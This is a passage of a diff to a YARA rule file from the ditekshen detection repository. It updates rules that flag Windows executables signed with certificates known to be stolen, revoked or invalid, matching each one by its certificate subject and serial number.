 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5695-L5706"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L510-L521"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "0e6e75206bea63856e4ab07ff9b1220448f3cad6d845ae09703b9e836015520d"
+		logic_hash = "8d0a6714ce5bfed90c80dcfffe4f1d61ec25c817cdc48907cbc67bcee52a1d9a"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "c5d34eb26bbb3fcb274f9e9cb37f5ae6612747a1"
+		thumbprint = "d0ae777a34d4f8ce6b06755c007d2d92db2a760c"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Bisoyetutu Ltd Ltd" and pe.signatures [ i ] . serial == "26:2c:a7:ae:19:d6:88:13:8e:75:93:28:32:b1:8f:9d" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TES LOGISTIKA d.o.o." and pe.signatures [ i ] . serial == "02:92:c7:d5:74:13:2b:a5:c0:44:1d:1c:7f:fc:b8:05" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_6B0008Bbd5Eb53F5D9E616C3Ed00000008Bbd5 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_028D50Ae0C554B49148E82Db5B1C2699 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "51e670b5-a679-52ef-9c07-5a2bd21f8a20"
+		id = "35cd05db-c399-5d37-a191-9170b048e263"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5708-L5719"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L523-L534"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "185334d7f484585cd88a1d89516f805d0248234a61153f8a38cc78b52d4bd764"
+		logic_hash = "7fe907059e83a058705a2884d514938c51fd206b0a175cfb9e8619244c20c62f"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "a24cff3a026dc6b30fb62fb01dbda704eb07164f"
+		thumbprint = "0abdbc13639c704ff325035439ea9d20b08bc48e"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "microsoft.com" and pe.signatures [ i ] . serial == "6b:00:08:bb:d5:eb:53:f5:d9:e6:16:c3:ed:00:00:00:08:bb:d5" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VAS CO PTY LTD" and pe.signatures [ i ] . serial == "02:8d:50:ae:0c:55:4b:49:14:8e:82:db:5b:1c:26:99" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_6Abc3555Becca0Bc4B6987Ccc2Ea42B5 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_0Ca41D2D9F5E991F49B162D584B0F386 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "b3ced8b8-ec42-56e4-8a3e-9cb7f6845b6f"
+		id = "bd395177-daf6-56b1-822c-e659083e0f53"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5721-L5732"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L536-L547"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "76d4895f805a6638549c2d3b01a53873156e142d741b1fc2ccc0b18971b275a7"
+		logic_hash = "51f80dfd63b273e62abaa8b60a00525cfdc6b28341466a9f414703382ad088bd"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "a36c75dd80d34020df5632c2939e82d39d2dca64"
+		thumbprint = "23250aa8e1b8ae49a64d09644db3a9a65f866957"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Jwkwjaagoh" and pe.signatures [ i ] . serial == "6a:bc:35:55:be:cc:a0:bc:4b:69:87:cc:c2:ea:42:b5" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VB CORPORATE PTY. LTD." and pe.signatures [ i ] . serial == "0c:a4:1d:2d:9f:5e:99:1f:49:b1:62:d5:84:b0:f3:86" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_3C5Fc5D02273F297404F7B9306E447Bb : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_1389C8373C00B792207Bca20Aa40Aa40 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "2dd0805d-f43e-5aec-a0d9-98fc9fa6c088"
+		id = "7f22411b-6e66-5177-8837-12b82b3b916b"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5734-L5745"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L549-L560"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e73fd0a38c76783e3110abe82411cc3d22fbbc95684667dc754618f590f29970"
+		logic_hash = "5c0c9ca9e1179f253f1b2ecd9c8a1a0ed17345eb9830201c7c16050339d7ccbc"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "3fa4a6efd5e443627e9e32e6effe04c991f4fe8f"
+		thumbprint = "38f65d64ac93f080b229ab83cb72619b0754fa6f"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Wirpool Soft" and pe.signatures [ i ] . serial == "3c:5f:c5:d0:22:73:f2:97:40:4f:7b:93:06:e4:47:bb" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VITA-DE d.o.o." and pe.signatures [ i ] . serial == "13:89:c8:37:3c:00:b7:92:20:7b:ca:20:aa:40:aa:40" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_7D36Cbb64Bc9Add17Ba71737D3Ecceca : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_A596Fd2779E507Aa466D159706Fe4150 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "23786dd4-2ad2-5d86-a0d2-46bc5f1825eb"
+		id = "8cf28e2a-d90f-5bf6-b746-7f46e8f6aa2a"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5763-L5774"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L562-L573"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "070600994d7e137a769432e7c5995dac90f01cbce2c50de4c5baecea5d556baf"
+		logic_hash = "b88f346175e9084fdba94b9a8cbbf28a5012d28ab43350d927aac099921ab1a3"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "a7287460dcf02e38484937b121ce8548191d4e64"
+		thumbprint = "104c4183e248d63a6e2ad6766927b070c81afcb6"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "LTD SERVICES LIMITED" and pe.signatures [ i ] . serial == "7d:36:cb:b6:4b:c9:ad:d1:7b:a7:17:37:d3:ec:ce:ca" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ClamAV" and pe.signatures [ i ] . serial == "a5:96:fd:27:79:e5:07:aa:46:6d:15:97:06:fe:41:50" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_00Df7139E106Dbb68Dfe4De97D862Af708 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_45D76C63929C4620Ab706772F5907F82 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "8da7c163-02a7-571e-a995-c1d500d90b5b"
+		id = "6ade67b1-cff5-5e5d-917c-f31010e09b82"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5776-L5787"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L575-L586"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "503ff5f570191ac61a20c2a6ffa5117d5c3ed632c04c4a02c710644c18a494d0"
+		logic_hash = "9854a8812f55f2ae7cddc714b780def3d0511b236685a17ffe202711237c4b7e"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "4ac627227a25f0914f3a73ff85d90b45da589329"
+		thumbprint = "67c4afae16e5e2f98fe26b4597365b3cfed68b58"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "zPfPJHDCzusZRYQYJZGZoFfZmvYtSlFXDPQKtoQzc" and pe.signatures [ i ] . serial == "00:df:71:39:e1:06:db:b6:8d:fe:4d:e9:7d:86:2a:f7:08" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "NEON CRAYON LIMITED" and pe.signatures [ i ] . serial == "45:d7:6c:63:92:9c:46:20:ab:70:67:72:f5:90:7f:82" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_00D4F9Fc08895654F8Bde8D1Cc26Eff015 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_5029Daca439511456D9Ed8153703F4Bc : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "d32f82a7-36dd-555f-87cf-28e520a3916f"
+		id = "1d7f0d61-fbe7-58d1-a9d8-083678e8b9bd"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5789-L5800"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L588-L599"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "dfc90ce9c1d8a0fad9c50f61c90c4f7b00b6890ee45d218417f4a7196c3d1c18"
+		logic_hash = "256b4bebbe4567de9e7d1938dd99f7f9fa13749de2f331aec0bc15f4ab5ab488"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "f24af3a784c2316b42854c5853b53d9e556295f7"
+		thumbprint = "9d5ded35ffd34aa78273f0ebd4d6fa1e5337ac2b"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "kfbdAfVnDMDc" and pe.signatures [ i ] . serial == "00:d4:f9:fc:08:89:56:54:f8:bd:e8:d1:cc:26:ef:f0:15" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "THE GREEN PARTNERSHIP LTD" and pe.signatures [ i ] . serial == "50:29:da:ca:43:95:11:45:6d:9e:d8:15:37:03:f4:bc" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_0393Be7Fd785Ba0E3223A73B15Ee6736 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_1C7D3F6E116554809F49Ce16Ccb62E84 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "852c3c5c-e20c-5e45-acee-7f5a5a35fa24"
+		id = "66f4c531-5c0d-5467-a875-eff00a5d00c8"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5802-L5813"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L601-L612"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "6805b2d04f8b89b9d4db8d47d74e83b6cdd7e778b038883fc8d3ef2e1b157070"
+		logic_hash = "f24037e6ac40844095e06ea12cebdf4dd22a35382c728f9586b90e40c57a4188"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "f50fc532839ca7e63315e468c493512db8b7ee83"
+		thumbprint = ""
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FZaKundypKakCIvoMBPpTnwIDUJM" and pe.signatures [ i ] . serial == "03:93:be:7f:d7:85:ba:0e:32:23:a7:3b:15:ee:67:36" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "1549 LIMITED" and pe.signatures [ i ] . serial == "1c:7d:3f:6e:11:65:54:80:9f:49:ce:16:cc:b6:2e:84" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_008B7369B2F0C313634A1C1Dfc4A828A54 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_75522215406335725687Af888Dcdc80C : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "e4da4da0-68f1-548b-b307-e11ad6def316"
+		id = "712d41e1-6760-5124-8af2-c57a87816237"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5815-L5826"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L614-L625"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "857eaa56ff5106e3808750b8833fd33a328b53a04f6fd2939aca30dbc6048329"
+		logic_hash = "5166ea726b1be824e5702c411800236d60c44fbfc89a39b1bc103de965249d7d"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "1cad5864bcc0f6aa20b99a081501a104b633dddd"
+		thumbprint = ""
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "LFpKdFUgpGKj" and pe.signatures [ i ] . serial == "00:8b:73:69:b2:f0:c3:13:63:4a:1c:1d:fc:4a:82:8a:54" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "THEESOLUTIONS LTD" and pe.signatures [ i ] . serial == "75:52:22:15:40:63:35:72:56:87:af:88:8d:cd:c8:0c" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_59A57E8Ba3Dcf2B6F59981Fda14B03 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_768Ddcf9Ed8D16A6Bc77451Ee88Dfd90 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "07e68e53-ffb8-5f12-ad0e-cf64a3c9cb72"
+		id = "f7d24c5f-e102-568e-bf44-47ccaad6225c"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5828-L5841"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L627-L638"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "1eeeef14502daafb303d1c09d8e55fb4df57a6bf250d1adc7e53862f2f5d5824"
+		logic_hash = "ba98f0da84b678262ee98e5c5fec2aaeab9a0c304fd4552dd27e87aa54f79cdf"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "e201821e152d7ae86078c4e6a3a3a1e1c5e29f9a"
-		hash1 = "d9ace2d97010316fdb0f416920232e8d4c59b01614633c4d5def79abb15d0175"
-		hash2 = "80e363dee08f4f77e5a061c10f18503c7ce802818cf6bb1c8a16da0ba3877b01"
+		thumbprint = ""
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Medium LLC" and pe.signatures [ i ] . serial == "59:a5:7e:8b:a3:dc:f2:b6:f5:99:81:fd:a1:4b:03" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "THEESOLUTIONS LTD" and pe.signatures [ i ] . serial == "76:8d:dc:f9:ed:8d:16:a6:bc:77:45:1e:e8:8d:fd:90" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_00C79F817F082986Bef3209F6723C8Da97 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_59E378994Cf1C0022764896D826E6Bb8 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "2e831cd7-6992-5b5f-ad84-52590f3cc65a"
+		id = "465d0b0c-c9fa-5364-a5f4-0d765ee40081"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5843-L5856"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L640-L651"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b6dd9cb0d2383bce3ab13b6a660b3f5ba554a2bf1fce4aabb6dd36187cc57f45"
+		logic_hash = "1720636723f0eeab074e29e7c9bf2df3c8d951e27b25ea4b7db60f6c00102589"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "e2bf86dc46fca1c35f98ff84d8976be8aa0668bc"
-		hash1 = "dd49651e325b04ea14733bcd676c0a1cb58ab36bf79162868ade02b396ec3ab0"
-		hash2 = "823cb4b92a1266c880d917c7d6f71da37d524166287b30c0c89b6bb03c2e4b64"
+		thumbprint = "9a17d31e9191644945e920bc1e7e08fbd00b62f4"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Al-Faris group d.o.o." and pe.signatures [ i ] . serial == "00:c7:9f:81:7f:08:29:86:be:f3:20:9f:67:23:c8:da:97" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SEVA MEDICAL LTD" and pe.signatures [ i ] . serial == "59:e3:78:99:4c:f1:c0:02:27:64:89:6d:82:6e:6b:b8" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_Beb721Fcb3274C984479D6554Efe8F49 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_3D2580E89526F7852B570654Efd9A8Bf : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "311b4a7a-3185-5c61-961e-bd7d9bca28dd"
+		id = "a80493e6-ed0c-597a-a87e-19c8fa8dd8ce"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5858-L5869"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L668-L679"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "fdb28b4f8cf79d067ee8dcfc3109ceae38f7952c6fb34e61f489924d97d67151"
+		logic_hash = "19f418672850536aaac1983b45c3239d5c81c1e4b9b6ee36a761cfc7e2351531"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "2d1fd0cce4aa7e7dc6dd114a301825a7b8e887cf"
+		thumbprint = "c1b4d57a36e0b6853dd38e3034edf7d99a8b73ad"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CONFUSER" and pe.signatures [ i ] . serial == "be:b7:21:fc:b3:27:4c:98:44:79:d6:55:4e:fe:8f:49" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MIKL LIMITED" and pe.signatures [ i ] . serial == "3d:25:80:e8:95:26:f7:85:2b:57:06:54:ef:d9:a8:bf" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_00C4188D6B70B4Bd3B977B19Abd04C1157 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_5Da173Eb1Ac76340Ac058E1Ff4Bf5E1B : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "f5b2b4cf-39a5-59c6-860e-b738a2acfd89"
+		id = "1ef8f8b6-e4e9-5504-94bd-b24e81de5694"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5871-L5882"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L681-L692"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "6ed619e18d749c2524ad3c1ddc3268f9ddf77feb3a3f2c5954ae4e7124d63c75"
+		logic_hash = "c9bfbef4470ee2339ef68484f8a4f21628c0cf9a07770d68d91e6c11e0345786"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "90fefd18c677d6e5ac6db969a7247e3eb0b018df"
+		thumbprint = "acb38d45108c4f0c8894040646137c95e9bb39d8"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PRESTO Co., s.r.o." and pe.signatures [ i ] . serial == "00:c4:18:8d:6b:70:b4:bd:3b:97:7b:19:ab:d0:4c:11:57" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ALISA LTD" and pe.signatures [ i ] . serial == "5d:a1:73:eb:1a:c7:63:40:ac:05:8e:1f:f4:bf:5e:1b" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_00Ad255D4Ebefa751F3782587396C08629 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_378D5543048E583A06A0819F25Bd9E85 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "58e77872-5bd0-53b1-9595-c961c45e138c"
+		id = "3525888c-9558-5164-b94e-b16511a5ea72"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5884-L5895"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L694-L705"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "cc51de3852257b12a780f80755c7ca21f5d82542649c65072fd9427271da12ef"
+		logic_hash = "29c6ae99675b8ab2c497faad71791c3fc018e92447bd96f5b2b3f426e1a1322b"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "8fa4298057066c9ef96c28b2dd065e8896327658"
+		thumbprint = "cf933a629598e5e192da2086e6110ad1974f8ec3"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Ornitek" and pe.signatures [ i ] . serial == "00:ad:25:5d:4e:be:fa:75:1f:37:82:58:73:96:c0:86:29" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "KITTY'S LTD" and pe.signatures [ i ] . serial == "37:8d:55:43:04:8e:58:3a:06:a0:81:9f:25:bd:9e:85" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_084B6F19898214A02A5F32E6Ea69F0Fd : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_Fdb6F4C09A1Ad69D4Fd2E46Bb1F54313 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "37149424-6ce7-56db-98c5-3895bf3f5c9b"
+		id = "e1250c37-fa89-5b8e-bea2-3b5e14039aea"
 		date = "2020-11-19"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L5897-L5908"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L720-L731"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "844339ec8aaf93e279b294830a842f007d97adc4be4f6910d143ee16e5710ed5"
+		logic_hash = "ce78ab52d8aeb87ada9cb86007907a8ad46e91982cc8fff43a61e7ec96609eb2"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "4b89f40ba2c83c3e65d2be59abb3385cde401581"
+		thumbprint = "4d1bc69003b1b1c3d0b43f6c17f81d13e0846ea7"
 		importance = 20
 
 	condition:
